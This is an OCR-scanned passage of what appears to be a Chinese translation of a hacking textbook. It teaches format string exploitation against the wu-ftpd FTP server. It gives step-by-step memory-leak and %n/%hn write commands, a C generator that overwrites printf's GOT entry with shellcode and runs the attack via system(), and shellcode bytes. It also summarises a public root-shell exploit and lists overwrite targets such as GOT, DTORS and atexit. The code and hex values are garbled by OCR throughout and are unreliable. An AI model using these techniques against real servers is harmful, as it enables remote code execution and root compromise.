
if( atoi( argv[3] ) == 1 ) 


{ 
printf("Press a key to send the string...\n"); 
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getc( stdin ); 


streat( buff, "site index " ); 
Sprintf( tmp, "%.4000s\n", argv[2] ): 
strcat( buff, tmp ); 


ftp send( s, buff ); 
receive from server( s, 1 ); 
shutdown( s, SHUT RDWR ); 


return 1; 
} 


(注意; 先 用 你 的 用 户 信息 蔡 换 相关 信息 。》 编 译 这 个 程序 并 运行 它 。 

从 最 基本 的 栈 弹 出 操作 开始 : 

./dowu localhost "%x bx $x bx bx Sx x X Sx SX Bx BX Bx SX Bx Bx Bx" 0 

在 你 机 器 上 输出 的 数据 应 该 和 下 面 类 似 : 

00-index 12 12 bfffca9c 0 14 0 14 0 8088bcO 00000000 

真 需要 输入 这 么 多 %x 吗 ? 当然 不 是 ! 在 绝 大 多 数 *NIX 平 台 上 ,可 以 用 直接 参数 访问 来 帮忙 。 
注意 上 面 的 输出 ， 从 栈 上 弹出 的 第 三 个 值 是 pfffca9c。 

试 一 下 下 面 这 条 命令 : 

./dowu localhost "%3\$x" 0 

应 该 会 输出 如 下 内 容 : 

200-index bfffca9c 

看 ! 我 们 可 以 直接 指定 访问 第 三 个 参数 并 输出 它 的 内 容 。 这 个 特性 比较 有 意思 ， 指 定 偏 移 量 
就 有 机 会 访问 esp 之 前 的 数据 。 

利用 这 个 特性 看 看 栈 上 有 什么 : 

for({ i = 1; i < 1000; i++)); do echo -n "$i " && ./dowu localhost "%$i\$x" 0; done 

这 条 命令 把 从 栈 顶 开始 的 1000 个 双 字 数据 输出 ， 其 中 某 些 数据 可 能 是 我 们 感 兴趣 的 。 

为 了 防止 输出 中 的 某 些 数据 是 指向 我 们 感 兴趣 的 字符 串 的 指针 ， 也 可 以 用 ss 格式 符 代 
替 %x: 

for(( i = 1; i < 1000; i++)); do echo -n "$i " && ./dowu localhost "%$i\$s" 0; done 

由 于 可 以 利用 ss 格式 符 从 栈 上 获取 字符 串 ， 因 此 ， 可 以 从 内 存 的 任意 位 置 获取 字符 串 。 为 
了 达到 这 个 目的 ， 首 先 需要 算出 提交 的 字符 串 在 栈 上 的 起 始 位 置 。 于 是 ， 可 以 执行 下 列 命令 : 


for({{ i = 1; i < 1000; i++)); do echo -n "$i " && ./dowu localhost "AAA 
AAAAAAAAAAAAASSiNSx" 0; done | grep 4141 
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从 输出 的 数据 里 面 〈 在 这 个 格式 化 串 的 开头 ) 可 以 找到 41414141 的 位 置 。 在 我 的 机 器 上 是 272， 
但 你 的 可 能 不 一 样 。. 

继续 。 修 改 字 符 串 的 开头 ， 看 看 参数 272 中 有 什么 : 

./dowu localhost "BBBA%272\$x" 0 
得 到 : 

200-index BBBA41424242 

上 面 的 输出 显示 在 272 处 是 字符 串 的 头 4B。 因 此 ， 可 以 用 这 个 方法 读 取 内 存 中 任意 位 置 的 
数据 。 

从 一 个 我 们 知道 肯定 存在 的 位 置 开 始 : 


for(( i = 1; i < 1000; i++)); do echo -n "$i " && ./dowu localhost "%$i\$s" 0; done 


在 187 处 ， 得 到 : 


200-index BBBA%s FTP server (%s) ready. 


因而 ， 可 以 用 sx 格式 符 得 到 字符 串 的 地 址 ; 


./dowu localhost "BBBA%187\$x" 0 
200-index BBBA8064d55 


可 以 试 着 用 下 面 的 命令 把 0x08064d55 处 的 字符 串 读 出 来 : 

./dowu localhost $'\x55\x4d\x06\x08%272$s' 0 

200-index U%s FTP server (%s) ready. 

这 里 要 注意 一 下 ， 因 为 1386 系 列 处 理 器 的 字 节 序 是 little-endian， 所 以 必须 把 “地 址 ”的 字 节 
序 反 序 。 

从 前 面 的 内 容 中 我 们 知道 , 通过 在 字符 串 的 开头 指定 内 存 地 址 以 及 使 用 直接 参数 访问 , 可 以 
从 内 存 中 指定 的 位 置 获取 数据 。 因 此 ， 可 以 利用 这 个 方法 从 内 存 中 获取 数据 ， 甚 至 获取 整个 地 址 
空间 的 数据 。 

如 果 你 攻击 的 平台 (如 Windows) 不 支持 直接 参数 访问 ， 那 么 通过 在 格式 化 串 中 放 入 足够 多 
的 格式 符 ， 我 们 一 样 可 以 访问 指定 位 置 的 数据 。 

因为 目标 进程 可 能 会 限制 字符 串 的 大 小 ， 所 以 当 放 入 多 个 格式 符 时 ， 有 可 能 会 出 问题 , 但 是 
还 是 有 成 功 的 可 能 性 。 比 如 说 ， 当 用 从 栈 上 弹出 数据 的 方法 来 到 达 选 择 的 参数 时 ， 你 可 以 使 用 那 
些 可 以 接受 更 大 参数 的 格式 符 ， 如 $f 格式 符 〔 它 接受 双 精 度 、8B 的 浮 点 数 作为 参数 )。 然 而 ， 这 
个 方法 不 太 稳定 , 因为 当 使 用 %f 格 式 符 时 ， 系统 可 能 会 对 它 进 行 优化 , 从 而 导致 错误 。 除 此 之 外 ， 
有 时 候 还 可 能 会 出 现 “ 被 0 除 ” 错 误 ， 因 此 你 可 能 会 尝试 用 %.f 格 式 符 仅 显 示 数 值 的 整数 部 分 ， 从 
而 避免 被 0 除 。 

另外 也 可 以 使 用 * 限 定 符 ，* 号 用 于 动态 指定 输出 宽度 ， 而 不 是 将 宽度 固定 在 格式 化 串 中 ， 
例如 : 


printf ("%*d", 10, 123); 
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将 显示 前 面 带 有 空格 的 123， 其 总 长 度 为 10 个 字符 。 有 的 平台 还 允许 下 面 这 样 的 语法 ; 
BRK KKK ***10gd 


这 总 是 显示 10 个 字符 。 这 意味 着 我 们 可 以 做 到 弹出 的 4B 到 格式 化 串 的 1B 的 比率 ， 
4.5 ”控制 程序 执行 


利用 前 面 提 到 的 方法 就 可 以 从 目标 进程 的 内 存 空间 获取 感 兴趣 的 数据 , 但 是 我 们 的 目标 不 仅 
仅 是 这 个 ， 我 们 的 目标 是 获取 程序 的 执行 控制 。 作 为 实现 目标 的 第 一 步 ， 应 该 先 设法 把 选择 的 双 
F (4B) 写 到 指定 的 内 存 地 址 。 在 wu-ftpd 的 例子 里 ， 我 们 将 用 4B 煞 据 枚 写 函 狐 指 针 MERNE 
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Program received signal SIGSEGV, Segmentation fault. 
0x400d109c in ?? () 


这 点 信息 还 不 能 说 明 什么 问题 ， 我 们 需要 更 多 的 信息 。 先 看 一 下 正在 执行 的 几 条 指令 ; 


x/5i Seip 

0x400d109c: mov Sedi, (%eax) 

0x400d109e: imp Ox400cf84d 

0x400d10a3: mov Oxfffff9b8(S$ebp),S$ecx 

0x400d10a9: test %ecx, $ecx 

0x400d10ab: je 0x400d10d0 

再 看 一 下 当时 寄存 器 里 保存 的 值 : 

info reg 

eax 0x41414141 1094795585 

ecx Oxb£fff9c70 -1073767312 

edx 0x0 0 

ebx 0x401Db298c 1075521932 

esp Oxb£fff8b70 Oxbfff8b70 

ebp Oxbfffa908 Oxbfffa908 

esi Oxbfff8b70 -1073771664 

edi Oxa 10 

我 们 会 发 现 mov bedi, (eax) 指令 正 准备 把 0xa 复 制 到 地 址 0x41414141。 这 和 预计 的 情形 
非常 接近 。 


0x41414141 只 是 为 了 验证 我 们 的 想法 而 选择 的 地 址 。 现 在 应 该 选择 一 个 有 意义 的 地 址 ， 可 
以 从 多 个 目标 中 选择 它 ， 包 括 : 

a 保存 的 返回 地 址 〈 直 接 栈 溢出 ， 用 信息 泄露 方法 来 确定 返回 地 址 的 位 置 ); 

a 全 局 偏 移 表 ‘GOT) (动态 重 定位 对 函数 ， 如 果 某 些 人 使 用 的 二 进 制 文件 与 你 的 一 样 ， 那 
就 太 好 了 ， 比 如 rpm); 
析 构 函数 “DTORS) 表 (函数 在 退出 前 将 调用 析 构 函数 ); 
C 函 数 库 钩 子 ， 例 如 malloc_ hook、realloc_ hook filfree_hook; 
atexit 结 构 (参考 atexit man 手 册 ); 
所 有 其 他 的 函数 指针 ， 例 如 C++ vtables、 回 调 函 数 等 ; 

口 Windows 里 默认 未 处 理 的 异常 处 理 程 序 ， 它 几乎 总 是 在 同一 地 址 。 

因为 我 们 比较 懒惰 ， 而 GOT 技 术 既 灵活 又 简单 ,为 我 们 利用 复杂 的 格式 化 串 漏洞 打开 了 一 肩 
希望 之 门 ， 所 以 就 选用 它 了 。 在 细 究 GOT 之 前 ， 先 大 概 看 一 下 wu-ftpd 的 问题 出 在 哪 。 


void vreply(long flags, int n, char *fmt, va_list ap) 


{ 
char buf[BUFSIZ]; 


DODD 


flags &= USE_REPLY_NOTFMT | USE_REPLY_LONG; 
if (n) /* if numeric is 0, don't output one; use n==0 in place of printf's * 
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sprintf(buf, "$03d$c", n, flags & USE REPLY LONG ? '-' : ' '); 
/* This is somewhat of a kludge for autospout. I personally think that 
* autospout should be done differently, but that's not my department. -Kev 
*/ if (flags & USE_REPLY_NOTFMT) 
snprintf(buf + (n? 4 : 0), n ? sizeof(buf) - 4 : sizeof(buf), "%s", fmt); 
else 
vsnprintf(buf + (n ? 4 : 0), n ? sizeof(buf) - 4 : sizeof(buf), fmt, ap); 


if (debug) /* debugging output :) */ 

syslog(LOG _ DEBUG, "«--- %s", buf); 
/* Yes, you want the debugging output before the client output; wrapping stuff goes here, 
* you see, and you want to log the cleartext and send the wrapped text to the client. 
*/ 








printf("%s\r\n", buf); /* and send it to the client */ 
#ifdef TRANSFER_COUNT 

byte count total += strlen (buf) ; 

byte_count_out += strlen(buf); 
#endif 

ff£lush (stdout); 
} 


注意 标 为 粗 体 的 那 行 。 那 里 比较 有 意思 ， 在 错误 地 调用 vsnprintf 之 后 , 程序 的 作者 正确 地 
调用 了 printf。 先 来 看 一 下 in.ftpd 里 的 GOT。 
objdump -R /usr/sbin/in.ftpd 


< 许多 输出 > 
0806d3b0 R_386_JUMP_SLOT printf 


< 更 多 的 输出 > 


从 上 面 显示 的 内 容 可 以 看 出 ， 我 们 可 以 修改 保存 在 0x0806d3b0 里 的 地 址 来 重 定 向 程序 的 执 
行 流 程 。 我 们 将 利用 格式 化 串 问题 改写 保存 在 0x0806d3b0 里 的 地 址 ， 程 序 随 后 将 会 跳 到 我 们 希 
望 的 地 方 继续 执行 。( 因 为 在 利用 格式 化 串 修改 保存 在 0x080693b0o 里 的 地 址 之 后 , we-ftpd 会 正确 
执行 到 printf， 从 而 执行 指定 的 代码 。) 

如 果 用 前 面 介 绍 的 方法 把 0xa 写 到 printf 的 地 址 ， 我 们 将 有 希望 跳 到 0xa。 


./dowu localhost $'\xb0\xd3\x06\x08%272Sn' 1 


像 前 面 那样 把 gdb 附 到 fp 的 子 进程 上 ， 应 该 会 看 到 这 样 的 显示 ; 


(gdb) symbol-file /usr/sbin/in.ftpd 

Reading symbols from /usr/sbin/in.ftpd...done. 

(gdb) attach 11902 

Attaching to process 11902 

0x4015a344 in ?? () 

(gdb) continue 

Continuing. 

Program received signal SIGSEGV, Segmentation fault. 
"0x0000000a in ?? (|) 
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Ok! 成 功 地 把 执行 流程 重 定向 到 指定 的 地 址 了 。 接 下 来 ,我 们 将 在 shellcode 的 配合 下 做 一 些 
有 意义 的 事情 。 
先 用 称 为 exit(2) 的 、 小 体积 的 shellcode 测 试 一 下 。 


terete oEEE—————————A———————————————————————————————— 


注解 经 过 长 时 间 的 积累 ， 我 发 现在 编写 利用 代码 时 使 用 内 联 汇编 有 诸多 好 处 。 比 如 说 可 以 方 
便 地 编辑 攻击 代码 : 也 可 以 先 创建 一 个 套 接 字 连 接 库 ， 以 备 不 时 之 需 ， 当 碰 到 shellcode 
不 工作 时 或 我 们 有 特殊 需求 时 ， 也 可 以 方便 地 进行 修改 ; 而 且 内 联 汇编 指令 比 十 六 进 制 
的 C 字 符 囊 更 具有 可 读 性 。 








#include <stdio.h> 
#include <stdlib.h> 


int main() 
{ 
asm("\ 

xor $eax, %eax; 
xor $ecx, %ecx; 
xor %edx, tedx; 
mov $0x01, %al; 
xor $ebx, %ebx; 
mov $0x02, %bl; 
int $0x80;\ 


一 一 一 一 一 一 


return 1; 


) 

在 这 里 通过 int 0x80 设 置 exit 系 统 调 用 。 编 译 并 运行 这 个 程序 ， 检 验 它 是 否 可 以 正常 工 
作 。 

因为 在 这 里 使 用 的 shellcode 比 较 小 ， 所 以 ， 可 以 把 shellcode 放 在 cor 的 位 置 。printf 的 地 址 
保存 在 0x0806d3b0， 那 就 把 shellcode 放 在 它 后 面 ， 假 定 是 在 0x0806d3b4 前 面 。 

这 里 有 个 问题 : 怎样 把 比较 大 的 数 写 入 选择 的 地 址 呢 ? 通过 前 面 的 学 习 , 我 们 知道 可 以 利用 
%n 格 式 符 把 较 小 的 数 写 入 选择 的 地 址 。 因 此 ,在 理论 上 ,可 以 利用 到 目前 为 止 输出 字符 之 外 的 低 
端 Clow-order) 字 节 重复 写 4 次 ， 每 次 1B。 当 然 ， 这 样 做 会 带 来 一 些 副作用 : 除了 改写 需要 的 4B 
外 ， 还 会 改写 紧 跟 其 后 的 3B。 

一 个 更 有 效 的 方法 是 使 用 h 长 度 修 饰 符 。 其 后 紧 跟 着 对 应 短 整 型 或 无 符号 短 整 型 参数 的 整数 
转换 ， 或 者 是 对 应 着 一 个 指向 短 整 型 参数 的 指针 的 n 转 换 。 

因此 ,如 果 使 用 格式 符 san, 我 们 应 该 可 以 写 入 16 位 的 数值 也 就 是 说 我 们 很 有 可 能 写 入 64KB 
范围 的 地 址 ， 执 行 下 面 这 段 代码 : 


./dowu localhost $'\xb0\xd3\x06\x08%50000x%2725n' 1 


得 到 : 
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Program received signal SIGSEGV, Segmentation fault. 
0x0000c35a in ?? () 


c35a 是 50010， 和 预计 的 差不多 。 这 里 需要 澄清 一 下 怎样 写 入 0xc35a。 

运行 以 下 代码 : 

./do_wu localhost abc 0 

wu-ftpd 将 会 输出 : 

200-index abe 

刚 提 交 的 格式 化 串 加 到 字符 串 index 的 结尾 (长度 为 6 个 字符 ) 了 。 这 意味 着 当 使 用 %n 格 式 
符 时 ， 写 入 了 以 下 数值 : 


6 + <number of characters in our string before the %n> + <padding number> 


因而 ， 如 果 这 样 做 : 

./dowu localhost $'\xb0\xd3\x06\x08%50000x%272Sn' 1 
就 把 (64500000 写 到 地 址 0x0806d3b0， 用 十 六 进 制 表 示 是 0xc35a。 现 在 设法 把 0x41414141 
写 到 printf 的 地 址 : 


./dowu localhost $'\xb0\xd3\x06\x08\xb2\xd3\x06\x08%16691x%272$n%273$n' 1 


135] : 

Program received signal SIGSEGV, Segmentation fault. 

0x41414141 in ?? (|) 

因此 跳 到 0x41414141。 这 里 掩饰 了 几 个 细节 ， 因 为 两 次 写 入 同样 的 值 (0x4141) 一 一 
一 次 是 参数 272 指 向 的 地 址 ， 另 一 次 是 参数 273 指 向 的 地 址 ， 刚 好 通过 指定 另外 的 位 置 上 的 参数 
$273$n« 

如 果 想 写 更 多 位 ， 字 符 串 将 会 变 得 很 复杂 。 下 面 的 程序 使 号 入 变 得 容易 一 些 。 


#include <stdio.h> 


#include <stdlib.h> 
int safe strcat( char *dest, char *src, unsigned dest len ) 


{ 
if( ( dest == NULL ) || ( src == NULL ) ) 
return 0; 


if ( strlen( src ) + strlen( dest ) + 10 >= dest len ) 


return 0; 
strcat( dest, src ); 


return 1; 


} 


int err( char *msg ) 


( 
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printf("%s\n", msg); 
return 1; 


int main( int argc, char *argv[] ) 

{ 
// modify the strings below to upload different data to the wu-ftpd process... 
char *string to upload = "mary had a little lamb"; 
unsigned int addr = 0x0806d3b0; 


// this is the offset of the parameter that 'contains' the start of our string. 
unsigned int param_num = 272; 

char buff[ 4096 ] = ""; 

int buff_size = 4096; 

char tmp[ 4096 ] = ""; 

int i, j, num so far = 6, num to print, num so far mod; 

unsigned short s; 

char *psz; 

int num addresses, a[4]; 


// first work out How many addresses there are. num bytes / 2 + num bytes mod 2. 
num addresses = (strlen( string to upload ) / 2) + strlen( string to upload) % 2; 


for( i = 0; i « num addresses; i++ ) 


{ 
a[0] = addr & Oxff; 
ali] = (addr & Oxff00) >> 8; 
a[2] = (addr & Oxff0000) >> 16; 
a[3] = (addr) >> 24; 
sprintf( tmp, "\\x%.02x\\x%.02x\\x%.02x\\x%.02x", a[0], afl], al2], a[3] ); 
if( !safe strcat( buff, tmp, buff size )) 
return err("Oops. Buffer too small."); 
addr 4- 2; 
num so far += 4; 
} 


printf( "s\n", buff ); 


// now upload the string 2 bytes at a time. Make sure that num so far is 
appropriate by doing $2000x or whatever. 
psz - string to upload; 


while( (*psz !- 0) && (*(psz«1) != 0) ) 
{ 
// how many chars to print to make (so far % 64k)--s 
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// 
S - *(unsigned short *)psz; 


num so far mod - num so far &Oxffff; 
num to print - 0; 


if( num so, far mod « s ) 
num to print - s - num so far mod; 
else 
if( num so far mod » s ) 
num to print = 0x10000 - (num so far mod - s); 


// if num so far mod and s are equal, we'll 'output' s anyway :o) 


num so far += num to print; 


// print the difference in characters 
if( num to print » 0 ) 
{ 
sprintf( tmp, "%%%dx", num to print ); 
if(!safe strcat( buff, tmp, buff size )) 
return err("Buffer too small."); 


// now upload the 'short' value 

Sprintf( tmp, "%%%d$hn", param num ); 

if( !safe strcat( buff, tmp, buff size )) 
return err("Buffer too small."); 


psz += 2; 
param_num++; 


printf( "s\n", buff ); 


Sprintf( tmp, "./dowu,localhost $'$s' 1\n", buff ); 
system( tmp ); 


return 0; 
} 


这 个 程序 作为 dowu 的 辅助 工具 ， 帮 着 把 字符 串 (mary had a little lamb) 上 载 到 GOT 的 
地 址 空间 。 
如 果 调 试 wu-ftpd 并 观察 刚才 改写 的 内 存 位置 ， 应 该 可 以 看 到 : 


x/s 0x0806d3b0 


0x806d03b0 <_GLOBAL_OFFSET_TABLE_+416>: "mary had a little 
lamb\026@\22065\017@V¥\ 004...(etc) 
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从 上 面 的 输出 可 以 看 到 , 现在 几乎 可 以 把 任意 字 节 写 入 内 存 的 任何 位 置 。 攻 击 前 的 准备 工作 
已 经 就 绪 了 。 

如 果 编 译 前 面 的 exit shellcode， 并 在 gdb 里 调试 ， 可 以 得 到 那些 汇编 指令 对 应 的 字 节 序列 ， 
如 下 : 

\x31\xcO\x31\xc9\x31\xd2\xb0O\x01\x31\xdb\xb3 x02\xcd\x80 

可 以 修改 刚 介 绍 的 gen_upload_string.c 来 上 载 这 个 字符 串 ， 


char *string to upload = 
"\xb4\xd3 \x06\x08\x31\xcO\x31\xc9\x31\xd2\xb0\x01\x31\xdb\xb3\x02\xcd\x80"; 
// exit (0x02); 


这 里 有 个 小 技巧 要 向 大 家 交待 一 下 。 字 符 串 开头 的 4B 是 用 来 改写 soT 中 的 printf 的 ， 当 程 
序 执行 有 问题 的 vsnprintf() 后 ， 接 着 会 调用 printf， 跳 到 改写 的 地 址 。 假 车 这 样 的 话 ， 我 们 
正好 改写 cor， 使 执行 流程 从 printf 开 始 持续 到 shellcode。 当 然 ， 这 并 不 是 什么 太 高 明 的 技巧 ， 
但 在 这 里 ， 它 用 最 小 的 麻烦 演示 了 这 个 技术 。 记 住 ， 你 正在 阅读 的 是 一 本 有 关 黑 客 的 书 ， 不 要 期 
望 我 们 把 每 件 事 都 说 得 很 清楚 。 

当 运 行 修改 后 的 gen_upload 字 符 串 时 ， 它 产生 下 列 gdb 会 话 : 


[root@vulcan format_string]# ps ~aux | grep ftp 


ftp 20578 0.0 0.4 2120 1052 pts/2 S 10:53 0:00 ftpd: 
localhost.1 


[root@vulcan format_string]# gdb 
(gdb) attach 20578 

Attaching to process 20578 

0x4015a344 in ?? () 

{gdb} continue 

Continuing. 


Program exited with code 02. 
(gdb) 


既然 已 经 在 wu-ftpd 里 成 功 运行 了 代码 ， 或 许 应 该 看 看 其 他 的 破解 代码 做 了 些 什么 。 

针对 wu-ftpd 的 这 个 漏洞 ， 最 流行 的 破解 是 wuftpd2600.c。 因 为 已 经 大 概 知道 怎样 利用 格式 
化 串 漏 洞 让 wu-ftpd 运 行 代 码 了 ， 所 以 我 们 将 抛 开 这 些 细节 ， 重 点 研究 它 的 shellcode 部 分 。 大 体 上 
说 ， 这 个 shellcode 做 了 以 下 几 件 事情 。 

(1) 为 了 得 到 根 特权 ， 把 setreuid() 设 为 0。 

(2) 利用 aup2 () 获得 std 句 柄 的 副本 ， 从 而 使 派生 的 shel 可 以 使 用 同样 的 套 接 字 。 

(3) 通过 跳 到 call 指 令 的 方法 ， 把 保存 的 返回 地 址 弹出 栈 ， 然 后 根据 它 计 算出 字符 串 在 缓冲 区 
中 的 位 置 。 

(4) 通过 在 chroot () 调用 之 后 重复 执行 chdir 来 括 开 chroot () 。 

(5) 在 execve ( ) 里 运行 shell。 

公开 流传 的 大 部 分 wu-ftpd 破 解 代码 都 使 用 和 上 面相 同 或 相似 的 shellcode。 
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4.6 为 什么 会 这 样 

在 回答 这 个 问题 之 前 ， 我 们 先 想 想 为 什么 会 出 现 格 式 化 串 呢 ? 你 可 能 会 想 ， 如 果实 现 
printf O 的 人 先 算出 传递 的 参数 数量 ， 然 后 把 它 和 字符 串 里 的 格式 符 数量 相 比 较 ， 如 果 不 一 至 
就 返回 错误 ， 沁 不 是 万 事 大 吉 ? | 但 是 ， 这 是 不 可 能 的 ， 因 为 C 处 理 有 可 变数 量 参数 的 函数 的 固 
有 方式 导致 这 个 方法 根本 行 不 通 。 

在 C 里 声明 有 可 变数 量 参数 的 函数 ， 可 以 用 下 面 这 样 的 省 略 句法 : 

void foo(char *fmt, ...) 

〈 你 可 能 想 通过 man va_arg 来 了 解 详情 。 这 是 个 不 错 的 主意 ， 因 为 man 手 册 详 细 解释 了 可 变 参 
数列 表 的 访问 。) 

当 函 数 得 到 调用 时 ， 可 以 用 va_start 宏 告诉 C 标 准 函 数 库 可 变 参 数列 表 是 从 哪里 开始 的 ， 然 后 
重复 调用 va_arg 宏 使 参数 弹出 栈 ， 最 后 调用 va_end 宏 ， 告 诉 C 标 准 函数 库 结 束 对 可 变 参数 列表 的 
使 用 。 

但 是 ， 这 个 方法 存在 一 个 问题 ， 就 是 不 能 确定 到 底 传递 了 多 少 个 参数 。 因 此 ， 必 须 依赖 其 他 
的 机 制 来 确定 到 底 传递 了 多 少 参 数 ， 例 如 用 格式 化 串 里 的 数据 或 空 值 来 确定 。 

foo( 1,2,3, NULL); 

尽管 这 令 人 难以 置信 ， 但 这 的 确 是 ANSI C89 处 理 有 可 变数 量 参数 函数 的 标准 方式 。 因 此 ， 
这 也 是 每 个 程序 员 都 要 遵循 的 标准 。 

从 理论 上 讲 ， 任 何 接受 可 变数 量 参 数 的 C 函 数 都 有 可 能 出 问题 ， 因 为 它 不 能 判断 参数 何 时 结 
束 ， 尽 管 实际 上 这 样 的 函数 相当 少 。 

总 结 一 下 ， 这 种 问题 是 ANSI 和 C89 共 有 的 缺陷 ， 几 乎 和 C 标 准 函 数 库 没 有 任何 关系 。 
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通过 前 面 的 学 习 ， 我 们 现在 应 该 可 以 在 Linux 平 台 上 利用 格式 化 串 漏 洞 了 。 在 这 一 节 ， 我 们 
将 快速 回顾 一 下 本 章 的 要 点 。 

(1) 如 果 格 式 化 串 在 栈 上 ， 当 增加 字符 串 的 格式 符 时 ， 可 以 提供 被 它 使 用 的 参数 。 如 果 为 了 
利用 格式 化 串 漏 洞 需要 进行 暴力 猜测 , 那 必须 猜测 的 偏 移 量 是 在 接触 格式 化 串 之 前 必须 要 用 的 参 
数 的 数量 。 

一 旦 可 以 指定 参数 ; 

O 可 以 用 ss 从 目标 进程 读 取 内 存 数 据 ; 

a 可 以 用 sn 把 输出 的 字符 的 数量 写 入 任意 地 址 ，; 

a 可 以 用 宽度 修饰 符 修改 输出 的 字符 的 数量 ; 

a 可 以 用 %hn 修 饰 符 每 次 写 入 16 位 数值 ， 这 就 能 把 选择 的 值 写 入 指定 位 置 。 

(2) 如 果 选 择 的 地 址 包含 一 个 或 多 个 空 值 字 节 ， 那 我 们 仍然 可 以 通过 sn 写 入 ， 但 必须 分 成 两 
个 阶段 进行 。 首 先 ， 把 选择 的 地 址 写 入 栈 上 保存 的 参数 (为 了 做 到 这 一 点 ， 必 须知 道 栈 在 内 存 中 
的 位 置 )， 然 后 利用 sn 把 写 入 栈 上 参数 的 数据 写 入 地 址 。 
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当然 ， 如 果 地 址 里 的 空 字 节 碰巧 是 首位 字 节 【〔〈 在 Windows 格 式 化 串 漏 洞 里 ， 这 是 常 有 的 事 )， 


那么 还 可 以 利用 格式 化 串 本 身 结尾 的 空 字 节 。 


(3) 直接 参数 访问 (在 Linux Printf 家 族 的 实现 里 ) 允许 多 次 重用 同一 格式 化 串 里 的 栈 参 数 ， 
也 人 允许 直接 用 那些 我 们 感 兴趣 的 参数 。 直 接 参数 访问 包括 使 用 $ 修 饰 符 ， 例 如 : 


$272$x 


将 显示 栈 上 的 第 272 个 参数 。 记 住 ， 这 个 技巧 是 无 价 之 宝 。 

(4) 如 果 出 于 某 些 原因 不 能 用 shn 同 时 写 16 位 值 ， 但 仍 能 使 用 字 节 定位 写 和 sn， 那 我 们 可 以 
做 4 次 而 不 是 1 次 写 ， 并 且 用 字符 的 数量 拼凑 ， 这 就 可 以 每 次 都 写 入 低 字 节 。 表 4-1 显 示 了 如 果 想 
把 0x04030201 写 入 地 址 X， 我 们 应 该 做 些 什 么 。 





写 入 X+3 


执行 4 次 写 入 操作 后 
的 内 存 地 址 


0x01 


0x01 
0x02 
0x03 
0x04 
0x02 


54-1 


写 入 地 址 


X+2 
0x01 
0x02 
0x03 
0x04 
0x03 


X*3 
0x01 
0x02 
0x03 
0x04 
0x04 


X+4 


0x02 
0x03 
0x04 
0x04 


0x04 0x04 


这 个 方法 有 个 缺点 ， 就 是 除了 改写 的 4B 外 ， 还 会 覆盖 紧 跟 在 这 4B 后 面 的 3B。 根 据 不 同 的 内 
存 布局 ， 它 的 影响 可 能 并 不 大 。 但 在 Windows 平 台 上 破解 格式 化 串 漏 洞 时 ， 它 却 是 要 求 高 精度 的 


理由 之 一 。 


前 面 回 顾 了 利用 格式 化 串 漏 洞 读 、 写 内 存 的 技术 ， 现 在 看 看 它们 还 能 做 些 什么 。 

O 改写 保存 的 返回 地 址 。 要 做 到 这 点 ， 必 须 算 出 保存 返回 地 址 的 地 址 ， 这 意味 着 可 能 要 用 
到 推测 、 暴 力 猜测 或 信息 泄露 。 

a 改写 其 他 特殊 程序 的 函数 指针 。 这 不 太 容 易 ， 因 为 大 部 分 程序 都 不 会 给 你 留 下 可 用 的 函 
数 指针 。 然 而 ， 如 果 目 标 程序 是 用 C++ 写 的 ， 那 么 有 可 能 会 找到 有 用 的 函数 指针 。 

a 改写 指向 异常 处 理 程 序 的 指针 ， 然 后 引起 异常 。 在 这 个 方法 中 ， 猜 测 地 址 的 难度 比较 小 ， 
所 以 成 功率 比较 大 。 

口 改写 GOT 条 目 。 我 们 在 wu-ftpd 的 例子 里 就 是 这 样 做 的 。 这 个 方法 是 非常 不 错 的 选择 。 

O 改写 atexit 处 理 程序 。 是 否 可 以 使 用 这 个 方法 要 视 目标 程序 而 定 。 

a 改写 DTORS 区 段 里 的 条 目 。 要 详细 了 解 这 个 方法 ， 请 阅读 参考 文献 中 列 出 的 Juan M.Bello 
Rivas 的 文章 。 

用 非 空 数据 改写 空 值 终止 符 ， 把 格式 化 串 漏 洞 变 成 栈 或 堆 溢 出 。 这 个 方法 实现 起 来 比较 
麻烦 ， 但 可 能 比较 有 趣 。 

改写 程序 的 特殊 数据 ， 如 改写 保存 在 内 存 中 的 UID 或 GID。 

O 修改 字符 串 中 包含 的 命令 来 反映 你 选择 的 命令 。 
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如 果 栈 上 不 允许 执行 代码 ， 那 么 可 以 用 下 面 的 方法 轻松 绕 过 这 些 限 制 措施 。 

a 利用 %n 之 类 的 格式 符 ， 把 shellcode 写 到 内 存 中 指定 的 位 置 。 我 们 在 wu-ftpd 的 例子 里 就 是 
这 么 做 的 。 

口 如 果 准 备 暴 力 猜测 ， 那 可 以 用 与 寄存 器 相关 的 跳 转 的 方法 ， 这 样 做 将 使 我 们 有 更 多 的 机 
会 命中 shellcode〈 如 果 它 在 我 们 的 格式 化 串 中 )。 

例如 ， 如 果 shellcode 保 存在 地 址 esp+0x200， 那 么 可 以 用 类 似 下 面 的 内 容 改 写 GOT: 


add $0x200, %esp 
jmp esp 


这 就 是 可 以 跳 到 shellcode 的 代码 地 址 。 因 此 ， 在 改写 函数 指针 〈GOT 条 目 或 任何 东西 ) 后 ， 
我 们 将 会 跳 到 保存 shellcode 的 地 址 。 这 个 方法 也 可 以 使 用 那些 在 处 理 格式 化 串 之 后 指向 或 紧 挨 着 


shellcode 的 寄存 器 。 
实际 上 ， 可 以 先 写 一 个 小 shellcode， 通 过 它 寻 找 大 shellcode 缓 存 区 的 位 置 ， 然 后 跳 到 该 位 置 。 


相关 信息 请 查阅 Gera 和 Riq 发 表 的 精彩 论文 ， http://www.phrack.org/archives/59/p59-0x07.txt。 
4.8 小 结 


本 章 介绍 的 有 关 格 式 化 串 漏 洞 的 内 容 很 浅显 ,， 仅 作为 储备 知识 。 虽 然 格式 化 串 漏洞 出 现 的 频 
率 越 来 越 小 ， 但 通过 它 我 们 了 解 了 大 量 的 攻击 技术 ， 所 以 值得 花 些 时 间 学 习 。 















































































































































章 主要 介绍 Linux 上 的 堆 溢 出 , 使 用 的 是 Doug Lee 最 初 的 malloc 实 现 ， 因 此 也 把 它 称 
为 dimalloc。 本 章 还 将 介绍 一 些 在 面 对 其 他 malloc () 实现 的 时 候 有 所 帮助 的 概念 。 
实际 上 ， 写 堆 溢 出 攻击 代码 对 我 们 来 说 是 个 转折 点 ， 因 为 它 使 我 们 不 再 局 限于 从 保存 的 栈 指 
针 来 争夺 BITP。 许 多 函数 库存 储 重 要 的 元 数据 时 ， 其 中 夹杂 着 用 户 的 数据 ，dlmalloc 只 是 这 些 
函数 库 中 的 一 个 。 理 解 怎样 利用 malloc 的 错误 是 发 现 利 用 那些 不 属于 任何 已 有 分 类 错误 方法 的 
关键 。 
